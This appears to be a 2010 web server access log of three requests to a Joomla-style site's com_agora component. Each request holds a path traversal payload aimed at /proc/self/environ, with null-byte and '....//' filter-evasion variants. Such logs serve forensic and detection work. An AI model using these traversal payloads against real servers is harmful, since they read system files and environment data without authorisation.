74.52.119.106 - - [02/Sep/2010:13:21:55 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 68611 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:13:21:55 -0700] "GET /?option=com_agora&task=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 68614 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
74.52.119.106 - - [02/Sep/2010:13:21:56 -0700] "GET /?option=com_agora&task=....//....//....//....//....//....//....//....//....//....//....//proc/self/environ%0000 HTTP/1.1" 200 68631 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.dmulk.com"
